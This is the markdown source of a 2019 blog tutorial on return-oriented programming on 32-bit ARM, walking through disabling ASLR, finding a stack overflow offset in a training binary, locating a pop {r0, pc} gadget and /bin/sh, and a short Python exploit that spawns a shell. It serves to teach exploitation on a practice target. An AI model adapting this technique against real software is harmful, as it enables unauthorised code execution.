all repos — site @ eb9897402143d44831c4b20fd2ef104c3bb6da8a

source for my site, found at icyphox.sh

pages/txt/rop-on-arm.txt (view raw)

  1---
  2date: '2019-06-06'
  3subtitle: 'Making stack-based exploitation great again!'
  4template: text.html
  5title: 'Return Oriented Programming on ARM (32-bit)'
  6url: 'rop-on-arm'
  7---
  8
  9Before we start *anything*, you're expected to know the basics of ARM
 10assembly to follow along. I highly recommend
 11[Azeria's](https://twitter.com/fox0x01) series on [ARM Assembly
 12Basics](https://azeria-labs.com/writing-arm-assembly-part-1/). Once
 13you're comfortable with it, proceed with the next bit---environment
 14setup.
 15
 16Setup
 17-----
 18
 19Since we're working with the ARM architecture, there are two options to
 20go forth with:
 21
 221.  Emulate---head over to
 23    [qemu.org/download](https://www.qemu.org/download/) and install
 24    QEMU. And then download and extract the ARMv6 Debian Stretch image
 25    from one of the links [here](https://blahcat.github.io/qemu/). The
 26    scripts found inside should be self-explanatory.
 272.  Use actual ARM hardware, like an RPi.
 28
 29For debugging and disassembling, we'll be using plain old `gdb`, but you
 30may use `radare2`, IDA or anything else, really. All of which can be
 31trivially installed.
 32
 33And for the sake of simplicity, disable ASLR:
 34
 35``` {.shell}
 36$ echo 0 > /proc/sys/kernel/randomize_va_space
 37```
 38
 39Finally, the binary we'll be using in this exercise is [Billy
 40Ellis'](https://twitter.com/bellis1000)
 41[roplevel2](/static/files/roplevel2.c).
 42
 43Compile it:
 44
 45``` {.sh}
 46$ gcc roplevel2.c -o rop2
 47```
 48
 49With that out of the way, here's a quick run down of what ROP actually
 50is.
 51
 52A primer on ROP
 53---------------
 54
 55ROP or Return Oriented Programming is a modern exploitation technique
 56that's used to bypass protections like the **NX bit** (no-execute bit)
 57and **code sigining**. In essence, no code in the binary is actually
 58modified and the entire exploit is crafted out of pre-existing artifacts
 59within the binary, known as **gadgets**.
 60
 61A gadget is essentially a small sequence of code (instructions), ending
 62with a `ret`, or a return instruction. In our case, since we're dealing
 63with ARM code, there is no `ret` instruction but rather a `pop {pc}` or
 64a `bx lr`. These gadgets are *chained* together by jumping (returning)
 65from one onto the other to form what's called as a **ropchain**. At the
 66end of a ropchain, there's generally a call to `system()`, to acheive
 67code execution.
 68
 69In practice, the process of executing a ropchain is something like this:
 70
 71-   confirm the existence of a stack-based buffer overflow
 72-   identify the offset at which the instruction pointer gets
 73    overwritten
 74-   locate the addresses of the gadgets you wish to use
 75-   craft your input keeping in mind the stack's layout, and chain the
 76    addresses of your gadgets
 77
 78[LiveOverflow](https://twitter.com/LiveOverflow) has a [beautiful
 79video](https://www.youtube.com/watch?v=zaQVNM3or7k&list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN&index=46&t=0s)
 80where he explains ROP using "weird machines". Check it out, it might be
 81just what you needed for that "aha!" moment :)
 82
 83Still don't get it? Don't fret, we'll look at *actual* exploit code in a
 84bit and hopefully that should put things into perspective.
 85
 86Exploring our binary
 87--------------------
 88
 89Start by running it, and entering any arbitrary string. On entering a
 90fairly large string, say, "A" × 20, we see a segmentation fault occur.
 91
 92![string and segfault](/static/img/string_segfault.png)
 93
 94Now, open it up in `gdb` and look at the functions inside it.
 95
 96![gdb functions](/static/img/gdb_functions.png)
 97
 98There are three functions that are of importance here, `main`, `winner`
 99and `gadget`. Disassembling the `main` function:
100
101![gdb main disassembly](/static/img/gdb_main_disas.png)
102
103We see a buffer of 16 bytes being created (`sub sp, sp, #16`), and some
104calls to `puts()`/`printf()` and `scanf()`. Looks like `winner` and
105`gadget` are never actually called.
106
107Disassembling the `gadget` function:
108
109![gdb gadget disassembly](/static/img/gdb_gadget_disas.png)
110
111This is fairly simple, the stack is being initialized by `push`ing
112`{r11}`, which is also the frame pointer (`fp`). What's interesting is
113the `pop {r0, pc}` instruction in the middle. This is a **gadget**.
114
115We can use this to control what goes into `r0` and `pc`. Unlike in x86
116where arguments to functions are passed on the stack, in ARM the
117registers `r0` to `r3` are used for this. So this gadget effectively
118allows us to pass arguments to functions using `r0`, and subsequently
119jumping to them by passing its address in `pc`. Neat.
120
121Moving on to the disassembly of the `winner` function:
122
123![gdb winner disassembly](/static/img/gdb_disas_winner.png)
124
125Here, we see a calls to `puts()`, `system()` and finally, `exit()`. So
126our end goal here is to, quite obviously, execute code via the
127`system()` function.
128
129Now that we have an overview of what's in the binary, let's formulate a
130method of exploitation by messing around with inputs.
131
132Messing around with inputs :\^)
133-------------------------------
134
135Back to `gdb`, hit `r` to run and pass in a patterned input, like in the
136screenshot.
137
138![gdb info reg post segfault](/static/img/gdb_info_reg_segfault.png)
139
140We hit a segfault because of invalid memory at address `0x46464646`.
141Notice the `pc` has been overwritten with our input. So we smashed the
142stack alright, but more importantly, it's at the letter 'F'.
143
144Since we know the offset at which the `pc` gets overwritten, we can now
145control program execution flow. Let's try jumping to the `winner`
146function.
147
148Disassemble `winner` again using `disas winner` and note down the offset
149of the second instruction---`add r11, sp, #4`. For this, we'll use
150Python to print our input string replacing `FFFF` with the address of
151`winner`. Note the endianness.
152
153``` {.shell}
154$ python -c 'print("AAAABBBBCCCCDDDDEEEE\x28\x05\x01\x00")' | ./rop2
155```
156
157![jump to winner](/static/img/python_winner_jump.png)
158
159The reason we don't jump to the first instruction is because we want to
160control the stack ourselves. If we allow `push {rll, lr}` (first
161instruction) to occur, the program will `pop` those out after `winner`
162is done executing and we will no longer control where it jumps to.
163
164So that didn't do much, just prints out a string "Nothing much here...".
165But it *does* however, contain `system()`. Which somehow needs to be
166populated with an argument to do what we want (run a command, execute a
167shell, etc.).
168
169To do that, we'll follow a multi-step process:
170
1711.  Jump to the address of `gadget`, again the 2nd instruction. This
172    will `pop` `r0` and `pc`.
1732.  Push our command to be executed, say "`/bin/sh`" onto the stack.
174    This will go into `r0`.
1753.  Then, push the address of `system()`. And this will go into `pc`.
176
177The pseudo-code is something like this:
178
179    string = AAAABBBBCCCCDDDDEEEE
180    gadget = # addr of gadget
181    binsh  = # addr of /bin/sh
182    system = # addr of system()
183
184    print(string + gadget + binsh + system)
185
186Clean and mean.
187
188The exploit
189-----------
190
191To write the exploit, we'll use Python and the absolute godsend of a
192library---`struct`. It allows us to pack the bytes of addresses to the
193endianness of our choice. It probably does a lot more, but who cares.
194
195Let's start by fetching the address of `/bin/sh`. In `gdb`, set a
196breakpoint at `main`, hit `r` to run, and search the entire address
197space for the string "`/bin/sh`":
198
199    (gdb) find &system, +9999999, "/bin/sh"
200
201![gdb finding /bin/sh](/static/img/gdb_find_binsh.png)
202
203One hit at `0xb6f85588`. The addresses of `gadget` and `system()` can be
204found from the disassmblies from earlier. Here's the final exploit code:
205
206``` {.python}
207import struct
208
209binsh = struct.pack("I", 0xb6f85588)
210string = "AAAABBBBCCCCDDDDEEEE"
211gadget = struct.pack("I", 0x00010550)
212system = struct.pack("I", 0x00010538)
213
214print(string + gadget + binsh + system)
215```
216
217Honestly, not too far off from our pseudo-code :)
218
219Let's see it in action:
220
221![the shell!](/static/img/the_shell.png)
222
223Notice that it doesn't work the first time, and this is because
224`/bin/sh` terminates when the pipe closes, since there's no input coming
225in from STDIN. To get around this, we use `cat(1)` which allows us to
226relay input through it to the shell. Nifty trick.
227
228Conclusion
229----------
230
231This was a fairly basic challenge, with everything laid out
232conveniently. Actual ropchaining is a little more involved, with a lot
233more gadgets to be chained to acheive code execution.
234
235Hopefully, I'll get around to writing about heap exploitation on ARM
236too. That's all for now.